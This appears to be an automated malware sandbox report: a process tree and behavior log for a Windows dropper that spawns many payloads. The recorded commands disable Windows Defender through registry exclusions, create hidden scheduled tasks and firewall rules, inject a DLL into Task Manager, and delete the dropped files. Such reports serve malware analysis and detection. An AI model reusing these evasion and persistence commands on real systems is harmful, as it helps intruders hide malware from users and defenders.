faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe wd1PHHYFXTO2GwSbYNeKiEhd.exe PID 4196 wrote to memory of 2520 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe jtfXiAYn71DsfeALHUTabEl4.exe PID 4196 wrote to memory of 2520 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe jtfXiAYn71DsfeALHUTabEl4.exe PID 4196 wrote to memory of 2520 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe jtfXiAYn71DsfeALHUTabEl4.exe PID 4196 wrote to memory of 2712 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe CzOCCnZhsTntOC1DD4Afra50.exe PID 4196 wrote to memory of 2712 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe CzOCCnZhsTntOC1DD4Afra50.exe PID 4196 wrote to memory of 2712 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe CzOCCnZhsTntOC1DD4Afra50.exe PID 4196 wrote to memory of 3244 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe FzbLA0y21wf4Eb_GXZGPAkPK.exe PID 4196 wrote to memory of 3244 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe FzbLA0y21wf4Eb_GXZGPAkPK.exe PID 4196 wrote to memory of 3244 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe FzbLA0y21wf4Eb_GXZGPAkPK.exe PID 4196 wrote to memory of 1216 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe Kog456fPoi_qlj0gOuQ1ue72.exe PID 4196 wrote to memory of 1216 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe Kog456fPoi_qlj0gOuQ1ue72.exe PID 4196 wrote to memory of 1216 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe Kog456fPoi_qlj0gOuQ1ue72.exe PID 4196 wrote to memory of 3964 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe kdnmdIr2m3Z75rmoxMQY45zR.exe PID 4196 wrote to memory of 3964 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe kdnmdIr2m3Z75rmoxMQY45zR.exe PID 4196 wrote to memory of 3964 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe kdnmdIr2m3Z75rmoxMQY45zR.exe PID 4196 wrote to memory of 3232 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe _az72zCJh0iBWr5dTACKXrws.exe PID 4196 wrote to memory of 3232 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe _az72zCJh0iBWr5dTACKXrws.exe PID 4196 wrote to memory of 3232 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe _az72zCJh0iBWr5dTACKXrws.exe PID 4196 wrote to memory of 3680 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe HNYUwmuil6MtmEKe7lmDsMC3.exe PID 4196 wrote to memory of 3680 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe HNYUwmuil6MtmEKe7lmDsMC3.exe PID 4196 wrote to memory of 3680 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe HNYUwmuil6MtmEKe7lmDsMC3.exe PID 4196 wrote to memory of 4040 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe vl16pz8ikehSoCEiO6vpU86F.exe PID 4196 wrote to memory of 4040 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe vl16pz8ikehSoCEiO6vpU86F.exe PID 4196 wrote to memory of 4040 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe vl16pz8ikehSoCEiO6vpU86F.exe PID 4196 wrote to memory of 4316 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe FnPK_uULTBfwZezEEGCXaVE6.exe PID 4196 wrote to memory of 4316 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe FnPK_uULTBfwZezEEGCXaVE6.exe PID 4196 wrote to memory of 2284 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe l2S7FrWODIlvtiOh9PM4XNlS.exe PID 4196 wrote to memory of 2284 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe l2S7FrWODIlvtiOh9PM4XNlS.exe PID 4196 wrote to memory of 2284 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe l2S7FrWODIlvtiOh9PM4XNlS.exe PID 4196 wrote to memory of 1624 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe H4qQ5eq5WgfPy9pgenBRiiaH.exe PID 4196 wrote to memory of 1624 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe H4qQ5eq5WgfPy9pgenBRiiaH.exe PID 4196 wrote to memory of 1624 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe H4qQ5eq5WgfPy9pgenBRiiaH.exe PID 4196 wrote to memory of 5060 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe TUsKZ9i3PovwwAgsSaLpghkJ.exe PID 4196 wrote to memory of 5060 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe TUsKZ9i3PovwwAgsSaLpghkJ.exe PID 4196 wrote to memory of 5060 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe TUsKZ9i3PovwwAgsSaLpghkJ.exe PID 2520 wrote to memory of 2020 2520 jtfXiAYn71DsfeALHUTabEl4.exe jtfXiAYn71DsfeALHUTabEl4.exe PID 2520 wrote to memory of 2020 2520 jtfXiAYn71DsfeALHUTabEl4.exe jtfXiAYn71DsfeALHUTabEl4.exe PID 2520 wrote to memory of 2020 2520 jtfXiAYn71DsfeALHUTabEl4.exe jtfXiAYn71DsfeALHUTabEl4.exe PID 4316 wrote to memory of 4960 4316 FnPK_uULTBfwZezEEGCXaVE6.exe SETUP_~2.EXE -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 5056 attrib.exe 5628 attrib.exe -
outlook_win_path 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
PID:3704 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==4⤵PID:968
-
C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"4⤵
- Executes dropped EXE
PID:3516 -
C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe"C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4436 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST4⤵
- Creates scheduled task(s)
PID:4212 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST4⤵
- Creates scheduled task(s)
PID:3112 -
C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe"C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
PID:1808 -
C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe"C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:968 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",6⤵PID:4596
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",7⤵
- Loads dropped DLL
PID:5532 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",8⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4688 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",9⤵
- Loads dropped DLL
PID:6036 -
C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe"C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
PID:3608 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 4526⤵
- Program crash
PID:4292 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 7766⤵
- Program crash
PID:1044 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 7846⤵
- Program crash
PID:4436 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 7846⤵
- Program crash
PID:2596 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 8246⤵
- Program crash
PID:3240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 9846⤵
- Program crash
PID:6112 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 10126⤵
- Loads dropped DLL
- Program crash
PID:5348 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 13646⤵
- Program crash
PID:3224 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe" & exit6⤵PID:4128
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f7⤵
- Kills process with taskkill
PID:2176 -
C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe"C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe"5⤵
- Executes dropped EXE
PID:5436 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5436 -s 7086⤵
- Program crash
PID:6044 -
C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe"C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe"5⤵
- Executes dropped EXE
PID:5408 -
C:\Users\Admin\AppData\Local\Temp\7zSDD85.tmp\Install.exe.\Install.exe6⤵
- Executes dropped EXE
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe.\Install.exe /S /site_id "525403"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:2200 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵PID:6100
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&9⤵PID:4200
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3210⤵PID:4688
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6410⤵PID:1824
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵PID:3464
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&9⤵PID:2440
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3210⤵PID:4984
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6410⤵PID:3976
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHbFtyKwQ" /SC once /ST 00:21:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- Creates scheduled task(s)
PID:5364 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHbFtyKwQ"8⤵PID:5840
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Loads dropped DLL
PID:5044 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHbFtyKwQ"8⤵PID:2496
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bamNpdvhtkzLwlCraC" /SC once /ST 13:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe\" bH /site_id 525403 /S" /V1 /F8⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1712 -
C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe"C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5396 -
C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe"C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe" H6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5996 -
C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe"C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5344 -
C:\Windows\SysWOW64\attrib.exeattrib -?6⤵
- Views/modifies file attributes
PID:5628 -
C:\Windows\SysWOW64\cmd.execmd /c cmd < Inebriarti.htm & ping -n 5 localhost6⤵PID:5452
-
C:\Windows\SysWOW64\cmd.execmd7⤵PID:3092
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"8⤵
- Enumerates processes with tasklist
PID:109220 -
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"8⤵PID:109248
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm8⤵PID:109280
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pifTal.exe.pif H8⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:109296 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pifC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif9⤵PID:1164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 1210⤵
- Program crash
PID:6312 -
C:\Windows\SysWOW64\PING.EXEping localhost -n 58⤵
- Runs ping.exe
PID:109316 -
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost7⤵
- Runs ping.exe
PID:109464 -
C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe"C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4052 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",4⤵PID:4216
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",5⤵PID:5044
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",6⤵PID:6072
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",7⤵
- Loads dropped DLL
PID:5156 -
C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe"C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1744 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 20684⤵
- Program crash
PID:6016 -
C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe"C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2948 -
C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"3⤵
- Executes dropped EXE
PID:1624 -
C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3284 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2480
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:2272 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4588 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:5940 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:5732
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:796 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3144 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵PID:4904
-
C:\Windows\SysWOW64\sc.exesc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
PID:5780 -
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exeC:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe6⤵PID:2892
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "csrss" /f7⤵PID:6424
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "ScheduledUpdate" /f7⤵PID:6476
-
C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe"C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
PID:2284 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe" & del C:\ProgramData\*.dll & exit4⤵PID:5340
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f5⤵
- Kills process with taskkill
PID:5628 -
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:6052 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 15564⤵
- Program crash
PID:5440 -
C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe"C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE4⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908 -
C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe"C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1424 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe5⤵PID:5984
-
C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3232 -
C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"4⤵
- Executes dropped EXE
PID:3840 -
C:\Users\Admin\AppData\Local\Temp\M52CB.exe"C:\Users\Admin\AppData\Local\Temp\M52CB.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2616 -
C:\Users\Admin\AppData\Local\Temp\M52CB.exe"C:\Users\Admin\AppData\Local\Temp\M52CB.exe"6⤵PID:4688
-
C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3784 -
C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4204 -
C:\Users\Admin\AppData\Local\Temp\EH46E.exe"C:\Users\Admin\AppData\Local\Temp\EH46E.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
PID:5536 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -u rMbC4.Q /S6⤵PID:5348
-
